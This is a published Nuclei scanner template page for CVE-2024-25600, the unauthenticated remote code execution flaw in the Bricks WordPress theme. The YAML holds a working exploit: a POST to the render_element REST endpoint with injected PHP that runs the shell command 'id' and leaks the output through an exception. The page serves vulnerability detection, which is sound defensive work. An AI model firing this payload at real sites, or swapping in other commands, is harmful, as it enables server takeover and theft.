Unauthenticated Remote Code Execution – Bricks <= 1.9.6
ID: CVE-2024-25600
Severity: critical
Author: christbowel
Tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce
Description
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE), which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities.
YAML Source
id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a00473045022100f512e02532b6a2bb30b6d8bcc544993c0b3d144cdd9a6fba2bf488f4866a704902203c6bd7c898bbe5a920696119615b4ed2d79523070583883e1feae8fc0dd590e2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-25600.yaml"